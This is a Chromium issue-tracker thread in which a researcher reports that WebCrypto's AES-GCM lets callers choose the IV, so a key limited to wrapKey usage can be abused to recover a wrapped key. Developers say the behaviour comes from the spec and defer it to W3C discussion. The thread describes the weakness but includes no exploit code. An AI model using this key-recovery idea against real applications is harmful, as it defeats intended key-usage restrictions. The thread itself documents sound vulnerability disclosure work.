New issue
Advanced search Search tips

Issue 868929 link

Starred by 1 user

Issue metadata

Status: WontFix
Owner: ----
Closed: Aug 13
Cc:
Components:
EstimatedDays: ----
NextAction: ----
OS: ----
Pri: 2
Type: Bug



Sign in to add a comment

WebCrypto Design issue for AES GCM

Reported by antonio....@gmail.com, Jul 30

Issue description

UserAgent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36

Steps to reproduce the problem:
Instant Demo in 

https://asanso.github.io/firefox/aesgcm.html

What is the expected behavior?

What went wrong?
IMHO the Webcrypto API has a design issue (at least in the AES GCM case).
As you might see from the code in https://asanso.github.io/firefox/aesgcm.html I have created a wrapping key that has only  ["wrapKey" ] usage. It should not be possible to recover back the aeskey using  ["unwrapKey" ].
This is indeed the case. But given the fact the Webcrypto API allow to pass an explicit IV it is trivial in the AES GCM to recover back the aes key using "wrapKey"  again. See https://cryptosense.com/blog/attacks-on-key-wrapping-in-pkcs11-v2-40/ for the equivalent issue  in the HSM case.

Did this work before? N/A 

Does this work in other browsers? No

Chrome version: 67.0.3396.99  Channel: n/a
OS Version: OS X 10.13.3
Flash Version:
 
may you please delete this issue or make not public ? i published here by mistake..
Labels: Restrict-View-SecurityTeam
(Restricting as requested.)
Thanks @agl . Whoever will take this might also want to change the component to Blink - WebCrypo (As was my original plan before screwing things up :S)
Components: Blink>WebCrypto
Cc: eroman@chromium.org rsleevi@chromium.org
Labels: -OS-Mac
> Does this work in other browsers? No

Note that this is not specific to Chrome - other implementations (including Firefox) work this way, since the spec lets the user control the IV used during encryption.
@eroman

Yeah I know. As said above this bug was not ready to be filed. For some reason I clicked submit too early. Of course you are right about Firefox. I reported as well to them and they already filed https://github.com/w3c/webcrypto/issues/209
Ah understood!

I will defer the design question to Ryan then.
The W3C bug tracker is probably the better place to continue that discussion.
Hi guys, it would be great to hear some opinion.... :)
Status: WontFix (was: Unconfirmed)
Marking as WontFix, to continue discussion upstream.
Thanks a lot Ryan. It would actually be great get your opinion (here or upstream is the same :))
Project Member

Comment 12 by sheriffbot@chromium.org, Nov 19

Labels: -Restrict-View-SecurityTeam allpublic
This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot

Sign in to add a comment